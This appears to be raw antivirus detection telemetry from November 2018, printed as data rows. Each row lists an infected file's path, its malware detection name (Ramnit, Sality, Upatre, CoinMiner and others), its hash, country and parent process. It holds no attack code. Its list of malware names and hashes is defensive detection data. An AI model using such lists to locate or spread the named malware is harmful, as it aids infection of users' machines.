  Row(detection=Row(filename="inv_159436263_from_kunde, d'amore and doyle_8755981.pdf.zip --> avulsed standing price blank cartridge.exe", filepath="Inv_159436263_from_Kunde, D'Amore and Doyle_8755981.pdf.zip --> avulsed standing price blank cartridge.exe", filesize=64000, name='TR/Dldr.Upatre.SN.#M0.#R0'), hash='ff176cdf9d3ab8f5f26c86f1da545ff3608187001ecbb3225703823e8a9d4722', metadata=Row(cmdline=None, country='US', os_name='MacOS', os_vmajor='16', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T09:57:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='steam_api_c.dll', filepath='D:\\cs\\cs16v2017_oyunyoneticisi\\steam_api_c.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='e30f3d27fd2b91cd7e41e29b2e6b9fd7ef4a163eb88a8dab8a00803d6d91ea34', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-04T13:43:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='15d755b5.dll', filepath='C:\\Windows\\System32\\15d755b5.dll', filesize=2624000, name='HEUR/AGEN.1026959.#M1.#R1'), hash='ea46739aea84a86d2f8b8ac9a9add06e0701acd049b824493b2630f0bf1bf88b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=673048, timestamp='2018-11-04T16:21:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='vcredist_x86.exe', filepath='C:\\FILES\\Adobe Illustrator\\payloads\\Microsoft VC 2008 Redist (x86)\\vcredist_x86.exe', filesize=11264000, name='W32/Sality.AT.#M1.#R1'), hash='f2c12529759fabfc415d49233a2e868c06cd0fd6e10fe903ef1046e92dc25720', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:37:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='osppsvc.exe', filepath='C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\OSPPSVC.EXE', filesize=4640000, name='TR/Taranis.3608.#M1.#R1'), hash='f342100e2e9001f11fdf93f856b50fa43f9b85d2c6b5706ec0433e77206498da', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1936464, timestamp='2018-11-01T04:50:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='handout.doc', filepath='E:\\alex 1.11.18\\Bilder\\lloret\\Handout.doc', filesize=384000, name='W2000M/Ramnit.A.#M1.#R1'), hash='feceb360e0dbc19bfab0608db069babb1196286d8dce8f436f3d44ff1ae74ec7', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3904808, timestamp='2018-11-01T12:10:26Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='avscan-20181102-155805-e0d51c4e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-155805-E0D51C4E', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:58:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='optprostart.exe', filepath='C:\\Program Files\\Optimizer Pro\\OptProStart.exe', filesize=212000, name='PUA/OptimizerPro.Gen.#M2.#R6073'), hash='2a33ac6bc880560eada16c962b64dd9835ad890bda09f8d14095db0882703f16', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:31:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155857-e66a94ee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-155857-E66A94EE', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:58:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='m3.exe', filepath='I:\\ألعاب\\Games 1\\بليردو\\RECOIL\\ZBD\\M3\\M3.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='0369bd1cee65b85446c42b78907b158bf524d02ce48f67dd47c35a8347ab8707', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:41:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='\\\\?\\c:\\windows\\system32\\maintenancesservices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:46:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp8073104\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YHhybg0dXAt1eGqREw \\\\\\/ads:1 \\\\\\/mnl', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\JavaSetup_3350226355.exe', parentsize=2446409, timestamp='2018-11-02T19:25:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='unrhino.exe', filepath='\\\\192.168.1.6\\圖面資訊\\Rhinoceros 1.1 Evaluation\\UNRHINO.EXE', filesize=128000, name='HEUR/Patched.Ren.#M1.#R1'), hash='4907717a484cf9f641a48a8c9529c911cca64b82a232d48c27db83f6427d27fa', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4848960, timestamp='2018-11-02T08:11:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:14:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-101106-b264f808', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1cab3c85\\AVSCAN-20181102-101013-A70C872B\\AVSCAN-20181102-101106-B264F808', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:11:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='datamngrui.exe', filepath='C:\\Program Files\\Movies Toolbar\\Datamngr\\DatamngrUI.exe', filesize=3584000, name='PUA/iLivid.iona.#M1.#R1'), hash='494a88016582ae557b75ec848e12d6646e459779691bacea54d7ff9b246aa70c', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:23:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='15d48ced869114d974cd56c0999a6cf81b73fcf3e3806558be64d94187d42536', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\15D48CED869114D974CD56C0999A6CF81B73FCF3E3806558BE64D94187D42536', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='15d48ced869114d974cd56c0999a6cf81b73fcf3e3806558be64d94187d42536', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:41:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='parcel.bat', filepath='D:\\DOKUMENKU\\SUBID APUPPT\\PARCEL\\PARCEL.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe14_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe14 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:47:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='giao an lop 5 ca nam 20172018 soan rat chi tiet cktkn gdkns gdbvmt bien dao.exe', filepath='G:\\\xa0\\NAM HOC 2017-2018n\\Giao an lop 5 ca nam 20172018 soan rat chi tiet CKTKN GDKNS GDBVMT bien dao.exe', filesize=3456000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='4b5623ed6d755e5d916540b19be673c5c238a553fe194d57cd0137d382532598', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-02T12:14:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-14-12-07.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-27T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T06:02:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Users\\X\\DOWNLOADS\\flashupdate (1).exe', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='BG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T19:38:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sound.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\sound\\sound.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='5d18f83ab403a6fd35dbd00f33fa03f80b5772c3af78f29ea77c0ea13400e369', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='young.milf.pussy.xxx.webrip.wmv-ohrly.rar', filepath='C:\\_Nh\\Young.Milf.Pussy.XXX.WEBRiP.WMV-OHRLY-4\\.tmp\\Young.Milf.Pussy.XXX.WEBRiP.WMV-OHRLY.rar', filesize=5376000, name='TR/Agent.htex.#M1.#R1'), hash='3c4b1055bcc2b72e8ade5725baf9050d9ce6b6629e415620921bf03e4601ccf3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Newshosting\\newshosting.exe', parentsize=345088, timestamp='2018-11-02T08:15:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:34:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\aswidsagent.exe', parentsize=6800144, timestamp='2018-11-02T13:15:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:25:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='service_kms.exe', filepath='C:\\Users\\X\\Dropbox\\KMSPico v4.3\\KMSpico Only Service\\Service_KMS.exe', filesize=448000, name='TR/Kazy.157208.2.#M1.#R1'), hash='1f416428c46b91b1e1caa0bf7c99c74efdbc3c8db7e5946825d08c63569ea0b9', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-02T11:31:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ilttrptc.exe', filepath='\\\\?\\C:\\WINDOWS\\SysWOW64\\lvljrgea\\ilttrptc.exe', filesize=15232000, name='TR/Crypt.XPACK.402345.#M1.#R1'), hash='40234587da856a9a760f4ff824c17eb1da20ee23d69200da8a3b489a39d0ae72', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T22:42:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134256-89f9063c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_54044395\\AVSCAN-20181102-133949-6B870B95\\AVSCAN-20181102-134256-89F9063C', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:42:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:06:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:32:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:51:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0ff58fbe59a5a4d1457dcabed63f554044ce12fa439a3d7e72070800b978ec21', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0FF58FBE59A5A4D1457DCABED63F554044CE12FA439A3D7E72070800B978EC21', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='0ff58fbe59a5a4d1457dcabed63f554044ce12fa439a3d7e72070800b978ec21', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:55:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:53:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:18:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='m4.exe', filepath='I:\\ألعاب\\Games 1\\بليردو\\RECOIL\\ZBD\\M4\\M4.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='3a75081891da4a76aee7e8147c925a4f52f1ff32d389a6f1cd2f631d30c1601d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:41:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:07:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:23:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='38f7246fc04a8849121e0e02749710926e5c9ab6696b8acc5b1140a285824722', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T13:52:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa14492.41395\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa14492.41395\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T06:25:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-190034-cb14a4cd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_98d4435e\\AVSCAN-20181102-185941-C45444E1\\AVSCAN-20181102-190034-CB14A4CD', filesize=2560000, name='TR/Black.Gen2.#M1.#R1'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T11:00:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:27:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gardeningenthusiast-ttab02-2ac3e9e9cf35202ad2827766ceade26b.exe', filepath='C:\\Users\\X\\Desktop\\source\\MS\\InProd20181026-Tooltab\\GardeningEnthusiast-TTAB02-2AC3E9E9CF35202AD2827766CEADE26B.exe', filesize=380000, name='PUA/MyWebSearch.Gen.#M300.#R6777'), hash='152da9afd217d12b308a9ea213795cd2c3ea4636b4796140ee8177e744966031', metadata=Row(cmdline='x c:\\\\\\\\users\\\\\\\\X\\\\\\\\desktop\\\\\\\\source.7z -oc:\\\\\\\\users\\\\\\\\test_user\\\\\\\\desktop\\\\\\\\source\\\\\\\\ -pinfected', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Desktop\\Avira_Scripts\\7za.exe', parentsize=587776, timestamp='2018-11-02T04:28:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:08:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:23:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:17:53Z'), dt=datetime.date(2018, 11, 2)),
